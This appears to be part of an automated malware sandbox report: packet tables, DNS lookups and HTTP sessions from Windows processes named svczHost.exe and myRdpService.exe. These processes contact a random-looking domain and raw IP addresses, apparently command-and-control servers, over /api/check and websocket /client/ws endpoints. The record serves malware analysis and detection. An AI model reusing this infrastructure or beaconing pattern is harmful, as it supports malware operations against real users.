                                                                                                        Nov 8, 2024 11:12:42.651695967 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.651725054 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.651770115 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.652108908 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.652120113 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.652445078 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.890352964 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.890517950 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.891278028 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.891515970 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.891540051 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.891549110 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.891778946 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.891778946 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.892388105 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.892573118 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.892582893 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.892590046 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.892906904 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.893109083 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.893381119 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.143290043 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.143335104 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.143471956 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.143472910 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.143481970 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.143595934 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.143642902 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.143675089 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.143723011 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.143728971 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.143856049 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.143982887 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.387196064 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.387389898 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.388061047 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.388071060 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.388262987 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.388371944 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.388394117 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.388475895 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.389024019 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.389029980 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.389478922 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.389975071 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.392326117 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.392441034 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.392482996 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.393286943 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.393292904 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.394093037 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.637857914 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.638073921 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.638268948 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.638278961 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.638619900 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.638627052 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.638632059 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.638794899 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.638957977 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.638962984 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.639230967 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.639556885 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.639707088 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.639749050 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.639754057 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.639842033 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.639930010 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.640571117 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.640763044 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.640769958 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.640777111 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.640894890 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.641037941 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.641490936 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.641614914 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.641661882 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.641666889 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.641740084 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.641844034 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.642344952 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.642539978 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.642597914 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.642602921 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.642663002 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.642766953 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.643930912 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.644171000 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.644176006 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.692833900 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.889357090 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.889362097 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.889441967 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.889568090 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.889580011 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.889641047 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.889730930 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.889739037 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.889756918 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.889818907 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.889939070 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.890068054 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.890806913 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.890965939 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.890965939 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.891072035 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.891077042 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.891305923 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.891844034 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.891853094 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.892044067 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.892044067 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.892052889 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.892093897 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.892143965 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.892255068 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.893429041 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.893436909 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.893537998 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.893621922 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.893814087 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:43.893819094 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:43.894032955 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.134589911 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.134603024 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.134733915 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.134826899 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.134831905 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.134979963 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.135103941 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.136822939 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.136832952 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.137037992 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.137044907 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.137128115 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.137294054 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.138705015 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.138712883 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.138921976 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.138971090 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.138976097 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.139256954 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:44.347970963 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:44.348149061 CET49792443192.168.11.30172.67.137.62

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 8, 2024 11:10:29.551213026 CET6005253192.168.11.301.1.1.1
                                                                                                        Nov 8, 2024 11:10:29.705149889 CET53600521.1.1.1192.168.11.30
                                                                                                        Nov 8, 2024 11:10:50.345408916 CET5011353192.168.11.301.1.1.1
                                                                                                        Nov 8, 2024 11:10:50.477112055 CET53501131.1.1.1192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.534423113 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.668145895 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.668159962 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.668170929 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.669599056 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.683664083 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.683767080 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.684329033 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.813080072 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.813091040 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.813097954 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.813105106 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.813112974 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.813976049 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.814074039 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.839694023 CET63998443192.168.11.30162.159.61.3
                                                                                                        Nov 8, 2024 11:10:56.924221992 CET44363998162.159.61.3192.168.11.30
                                                                                                        Nov 8, 2024 11:10:56.950860977 CET63998443192.168.11.30162.159.61.3

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Nov 8, 2024 11:10:29.551213026 CET192.168.11.301.1.1.10x4f28Standard query (0)uyt1n8ded9fb380.comA (IP address)IN (0x0001)false
                                                                                                        Nov 8, 2024 11:10:50.345408916 CET192.168.11.301.1.1.10x87eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Nov 8, 2024 11:10:29.705149889 CET1.1.1.1192.168.11.300x4f28No error (0)uyt1n8ded9fb380.com172.67.137.62A (IP address)IN (0x0001)false
                                                                                                        Nov 8, 2024 11:10:29.705149889 CET1.1.1.1192.168.11.300x4f28No error (0)uyt1n8ded9fb380.com104.21.86.219A (IP address)IN (0x0001)false
                                                                                                        Nov 8, 2024 11:10:50.477112055 CET1.1.1.1192.168.11.300x87eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                        Nov 8, 2024 11:10:50.477112055 CET1.1.1.1192.168.11.300x87eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • uyt1n8ded9fb380.com
                                                                                                        • chrome.cloudflare-dns.com
                                                                                                        • armmf.adobe.com
                                                                                                        • 23.88.71.29:8000
                                                                                                        • 206.206.126.252:8008

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.11.3049784172.67.137.62809772C:\Windows\Temp\svczHost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 8, 2024 11:11:14.454435110 CET78OUTGET /api/check HTTP/1.1
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 8, 2024 11:11:15.130614042 CET1289INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:11:15 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-store,no-cache
                                                                                                        Pragma: no-cache
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2tFDozt%2FEmG1pyOvs50RuGS4EYTcEtg%2FoYIurhztNSEeDobzd4GApQd7nOHSS3faFsRlb0OnY94yaD0UcveE3dgP5UZVB1TdOF89uAdUyh%2BZ52%2Fm4uct6P%2FGoF3QJO6AL6EYwj%2BcLSH"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=28644&sent=16&recv=18&lost=0&retrans=0&sent_bytes=3687&recv_bytes=5767&delivery_rate=28960&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        vary: accept-encoding
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c71faccc4364-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102389&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=78&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 36 33 0d 0a 31 37 33 31 30 36 30 36 37 34 7c 4b 37 70 72 66 44 4d 69 56 45 41 33 35 70 59 5a 69 74 5a 77 6a 76 30 2b 51 74 66 71 59 77 32 63 73 50 6b 79 67 65 6f 35 78 79 5a 5a 65 2b 71 66 36 6a 32 42 45 35 5a 7a 76 2f 71 68 71 41 4b 58 45 77 33 4e 53 34 54 43 68 4a 7a 70 44 43 69 6f 74 6f 76 6b 57 52 43 62 42 4d 6a 68 63 37 4d 36 4f 4f 73 43 61 6d 56 49 6c 70 51 44 79 54 54 48 4a 77 51 6f 32 33 50 77 5a 71 39 45 2f 62 47 50 4d 4a 33 5a 6e 65 79 57 71 35 62 70 75 63 58 4d 64 7a 51 38 55 4d 65 64 68 5a 4b 35 37 41 39 38 70 31 6a 41 44 6e 44 69 71 52 59 37 59 73 6f 44 36 62 65 54 2b 68 34 68 2f 32 76 62 7a 73 77 2b 49 34 68 4a 50 6d 46 62 43 33 36 43 6d 54 4e 54 55 30 4b 53 65 73 5a 75 2b 65 32 36 2f 43 6a 2f 77 6f 4b 43 39 66 6f 45 75
                                                                                                        Data Ascii: 1631731060674|K7prfDMiVEA35pYZitZwjv0+QtfqYw2csPkygeo5xyZZe+qf6j2BE5Zzv/qhqAKXEw3NS4TChJzpDCiotovkWRCbBMjhc7M6OOsCamVIlpQDyTTHJwQo23PwZq9E/bGPMJ3ZneyWq5bpucXMdzQ8UMedhZK57A98p1jADnDiqRY7YsoD6beT+h4h/2vbzsw+I4hJPmFbC36CmTNTU0KSesZu+e26/Cj/woKC9foEu
                                                                                                        Nov 8, 2024 11:11:15.130621910 CET113INData Raw: 4b 4a 6c 44 33 58 68 64 5a 73 73 54 4c 75 34 4d 38 50 42 34 68 76 35 42 70 49 75 73 52 4d 62 54 49 53 69 66 45 5a 57 44 53 33 70 65 6c 79 35 76 71 4d 71 45 61 35 43 67 58 7a 6d 62 4a 4f 49 69 56 35 5a 2b 4c 34 32 41 38 72 65 34 32 61 4e 70 34 41
                                                                                                        Data Ascii: KJlD3XhdZssTLu4M8PB4hv5BpIusRMbTISifEZWDS3pely5vqMqEa5CgXzmbJOIiV5Z+L42A8re42aNp4AfXMTpDaGKSdIztIKICPskbPb3pA==
                                                                                                        Nov 8, 2024 11:11:15.130628109 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.11.304978923.88.71.2980007224C:\Windows\Temp\myRdpService.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 8, 2024 11:12:22.090193987 CET164OUTGET /client/ws HTTP/1.1
                                                                                                        Host: 23.88.71.29:8000
                                                                                                        Connection: Upgrade
                                                                                                        Upgrade: websocket
                                                                                                        Sec-WebSocket-Key: 7FFbF1a9LE6s2rh/7oiJ1A==
                                                                                                        Sec-WebSocket-Version: 13
                                                                                                        Nov 8, 2024 11:12:22.808973074 CET1289INHTTP/1.1 404 Not Found
                                                                                                        Cache-Control: private
                                                                                                        Upgrade: websocket
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AvSi%2BtyPnt5RK6IJo2SE7P30PruDiRYCrq7cLFyHbf6MyVnqHUQwjUoW%2BqMQ2Udw9kqKgq3pLTaWAMG2v0DW8OMJrYt3uuXaiJop4%2Fd5PjQYBk8mKae1jRDtE0AUrhn5tDkCnwTqXjb5"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        CF-RAY: 8df4c8c6ae8c3720-FRA
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8437&sent=866&recv=327&lost=0&retrans=0&sent_bytes=763595&recv_bytes=41353&delivery_rate=1859534&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Date: Fri, 08 Nov 2024 10:12:22 GMT
                                                                                                        Content-Length: 4852
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margi


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.11.3049790206.206.126.25280087224C:\Windows\Temp\myRdpService.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 8, 2024 11:12:25.160203934 CET168OUTGET /client/ws HTTP/1.1
                                                                                                        Host: 206.206.126.252:8008
                                                                                                        Connection: Upgrade
                                                                                                        Upgrade: websocket
                                                                                                        Sec-WebSocket-Key: Gp+0/Cu8Ek6hn/4v2BFh5g==
                                                                                                        Sec-WebSocket-Version: 13
                                                                                                        Nov 8, 2024 11:12:25.559345007 CET1289INHTTP/1.1 404 Not Found
                                                                                                        Cache-Control: private
                                                                                                        Upgrade: websocket
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Us5WuAXnEnokjlAe6p34%2BS6SrooJt%2FN%2B5RY6KklpqIyS77hbukeS4zQypuOXwI727saW2Ixji0SS7R4RPQoQTj4Sf6TFFd6nRoyY94YF9PAEHmoqUlfcN3gwLtJqjZC6kkF05eMTextA"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        CF-RAY: 8df4c8da4eefa053-SIN
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4915&sent=787&recv=534&lost=0&retrans=1&sent_bytes=633774&recv_bytes=74666&delivery_rate=8302193&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Date: Fri, 08 Nov 2024 10:12:25 GMT
                                                                                                        Content-Length: 4852
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        3192.168.11.304979123.88.71.298000
                                                                                                        TimestampBytes transferredDirectionData
